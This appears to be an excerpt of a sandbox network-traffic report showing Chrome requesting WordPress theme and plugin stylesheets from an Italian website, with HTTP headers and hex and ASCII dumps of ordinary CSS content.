                                                                                                                                              2025-01-03 16:32:58 UTC16091INData Raw: 2e 67 64 70 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 20 7b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 67 64 70 72 2d 72 6f 77 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 0a 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 09 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2d 31 35 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 35 70
                                                                                                                                              Data Ascii: .gdpr-container-fluid {width: 100%;padding-right: 15px;padding-left: 15px;margin-right: auto;margin-left: auto;}.gdpr-row {display: -ms-flexbox;display: flex;-ms-flex-wrap: wrap;flex-wrap: wrap;margin-right: -15px;margin-left: -15p
                                                                                                                                              2025-01-03 16:32:58 UTC11158INData Raw: 32 61 32 61 32 61 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 70 61 64 64 69 6e 67 3a 20 2e 35 72 65 6d 20 31 72 65 6d 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 32 35 72 65 6d 3b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 0a 7d 0a 2e 63 6c 69 2d 6e 61 76 2d 70 69 6c 6c 73 20 2e 63 6c 69 2d 6e 61 76 2d 6c 69 6e 6b 2e 63 6c 69 2d 61 63 74 69 76 65 2c 20 2e 63 6c 69 2d 6e 61 76 2d 70 69 6c 6c 73 20 2e 63 6c 69 2d 73 68 6f 77 3e 2e 63 6c 69 2d 6e 61 76 2d 6c 69 6e 6b 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 36 66 36 66 39 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 63 63 63 3b 0a 7d 0a 2e 63 6c 69 2d 6e 61
                                                                                                                                              Data Ascii: 2a2a2a;font-size: 14px;display: block;padding: .5rem 1rem;border-radius: .25rem;cursor: pointer}.cli-nav-pills .cli-nav-link.cli-active, .cli-nav-pills .cli-show>.cli-nav-link {background-color: #f6f6f9;border: 1px solid #cccccc;}.cli-na


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              56192.168.2.164977689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:58 UTC652OUTGET /wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-list-horizontal/style.css?ver=1 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:58 UTC291INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:58 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 851
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Thu, 10 Dec 2020 02:53:35 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:58 UTC851INData Raw: 2e 77 70 6d 6c 2d 6c 73 2d 6c 65 67 61 63 79 2d 6c 69 73 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 61 64 64 69 6e 67 3a 37 70 78 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 77 70 6d 6c 2d 6c 73 2d 6c 65 67 61 63 79 2d 6c 69 73 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 75 6c 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 2e 77 70 6d 6c 2d 6c 73 2d 6c 65 67 61 63 79 2d 6c 69 73 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 20 2e 77 70 6d 6c 2d 6c 73 2d 69 74 65 6d 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65
                                                                                                                                              Data Ascii: .wpml-ls-legacy-list-horizontal{border:1px solid transparent;padding:7px;clear:both}.wpml-ls-legacy-list-horizontal>ul{padding:0;margin:0 !important;list-style-type:none}.wpml-ls-legacy-list-horizontal .wpml-ls-item{padding:0;margin:0;list-style-type:none


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              57192.168.2.164977989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:58 UTC596OUTGET /wp-content/themes/enfold/config-wpml/wpml-mod.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:58 UTC291INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:58 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 809
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:58 UTC809INData Raw: 2e 61 76 69 61 5f 77 70 6d 6c 5f 6c 61 6e 67 75 61 67 65 5f 73 77 69 74 63 68 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 3a 20 30 70 78 20 30 20 30 20 31 30 70 78 3b 0a 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 30 20 30 20 30 3b 0a 7a 2d 69 6e 64 65 78 3a 20 31 35 31 3b 0a 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 74 6f 70 3a 2d 32 70 78 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 2e 73 75 62 5f 6d 65 6e 75 20 75 6c 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 0a 23 74 6f 70 20 75 6c 2e 61 76 69 61 5f 77 70
                                                                                                                                              Data Ascii: .avia_wpml_language_switch {position: relative;padding: 0px 0 0 10px;height: 30px;line-height: 36px;margin: 0 0 0 0;z-index: 151;-webkit-backface-visibility: hidden;top:-2px;right:0;overflow: hidden;}.sub_menu ul{float:left;}#top ul.avia_wp


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              58192.168.2.164977889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:58 UTC590OUTGET /wp-content/themes/enfold/css/shortcodes.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:58 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:58 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 32116
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:58 UTC16091INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 47 45 4e 45 52 49 43 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================GENERIC=============================================================================================
                                                                                                                                              2025-01-03 16:32:58 UTC16025INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 20 0a 20 23 74 6f 70 20 2e 61 76 2d 74 6f 67 67 6c 65 2d 73 77 69 74 63 68 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 09 0a 6f 70 61 63 69 74 79 3a 20 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 7d 20 0a 0a 20 20 0a 23 74 6f 70 20 2e 61 76 2d 74 6f 67 67 6c 65 2d 73 77 69 74 63 68 2e 61 63 74 69 76 65 7b 09 0a 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 61 76 69 61 2d 66 61 64 65 69 6e 20 31 73 20 31 20 65 61 73 65 2d 69 6e 3b 20
                                                                                                                                              Data Ascii: ======================================================== */ #top .av-toggle-switch{display: block; margin-bottom: 10px; margin-top:10px;opacity: 0;text-align: left;} #top .av-toggle-switch.active{-webkit-animation: avia-fadein 1s 1 ease-in;


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              59192.168.2.164978089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:58 UTC603OUTGET /wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:58 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:58 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 6948
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:17:10 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:58 UTC6948INData Raw: 2f 2a 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 43 53 53 20 2a 2f 0a 2e 6d 66 70 2d 62 67 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 34 32 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 38 3b 20 7d 0a 0a 2e 6d 66 70 2d 77 72 61 70 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 7a 2d 69 6e 64 65 78
                                                                                                                                              Data Ascii: /* Magnific Popup CSS */.mfp-bg { top: 0; left: 0; width: 100%; height: 100%; z-index: 1042; overflow: hidden; position: fixed; background: #000; opacity: 0.8; }.mfp-wrap { top: 0; left: 0; width: 100%; height: 100%; z-index


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              60192.168.2.164978189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:58 UTC601OUTGET /wp-content/themes/enfold/css/avia-snippet-lightbox.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:59 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:59 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3639
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:59 UTC3639INData Raw: 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6c 69 67 68 74 62 6f 78 20 65 6e 68 61 6e 63 65 6d 65 6e 74 73 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 0a 0a 2f 2a 20 0a 0a 2e 6d 66 70 2d 66 69 67 75 72 65 20 2d 20 63 6f 6e 74 61 69 6e 65 72 20 74 68 61 74 20 68 6f 6c 64 73 20 69 6d 61 67 65 20 61 6e 64 20 63 61 70 74 69 6f 6e 0a 2e 6d 66 70 2d 62 67 20 20 20 20 20 2d 20 62 6c 61 63 6b 20 6f 76 65 72 6c 61 79 0a 2e 6d 66 70 2d 70 72 65 6c 6f 61 64 65 72 20 2d 20 22 4c 6f 61 64 69 6e 67 2e 2e 2e 22 20 69 6e 63 64 69 63 61 74 6f 72 0a 0a 2a 2f 0a 2e 6d 66 70 2d 72 65 61 64 79 20 2e 6d 66 70 2d 66 69 67 75 72 65 20 7b 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 7d 0a 0a 64 69 76 20 2e 6d 66 70 2d 74 69 74 6c 65 7b 0a 09 6c 69
                                                                                                                                              Data Ascii: /*--------------------lightbox enhancements---------------*//* .mfp-figure - container that holds image and caption.mfp-bg - black overlay.mfp-preloader - "Loading..." incdicator*/.mfp-ready .mfp-figure { opacity: 0;}div .mfp-title{li


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              61192.168.2.164978289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:59 UTC599OUTGET /wp-content/themes/enfold/css/avia-snippet-widget.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:59 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:59 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 23906
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:59 UTC16091INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 23 53 69 64 65 62 61 72 20 26 20 57 69 64 67 65 74 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================#Sidebar & Widgets==================================================================================
                                                                                                                                              2025-01-03 16:32:59 UTC7815INData Raw: 3b 0a 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 32 65 6d 3b 0a 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 6e 65 77 73 2d 65 78 63 65 72 70 74 7b 0a 0a 7d 0a 0a 2f 2a 74 61 67 63 6c 6f 75 64 2a 2f 0a 2e 74 61 67 63 6c 6f 75 64 20 62 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 0a 2e 74 61 67 63 6c 6f 75 64 20 61 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 0a 6d 61 72 67 69 6e 3a 30 20 31 70 78 20 31 70 78 20 30 3b 0a 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 66 6c 6f 61 74 3a 6c 65 66 74 3b 0a 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a
                                                                                                                                              Data Ascii: ;clear: both;font-size:0.92em;display:block;}.news-excerpt{}/*tagcloud*/.tagcloud br{display:none;}.tagcloud a{font-size:11px !important;padding:2px 8px;margin:0 1px 1px 0;display:block;float:left;border-style: solid;border-width: 1px;


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              62192.168.2.164978489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:59 UTC599OUTGET /wp-content/uploads/dynamic_avia/enfold.css?ver=6335ddf9ba942 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:59 UTC294INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:59 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 163165
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Thu, 29 Sep 2022 18:03:37 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:59 UTC16090INData Raw: 0d 0a 0d 0a 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 63 39 39 63 36 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 7d 3a 3a 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 63 39 39 63 36 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 7d 68 74 6d 6c 2e 68 74 6d 6c 5f 62 6f 78 65 64 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 65 65 65 65 65 20 20 20 74 6f 70 20 6c 65 66 74 20 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 3b 7d 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 2c 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 64 69 76 2c 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 68 65 61 64 65 72 2c 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 6d
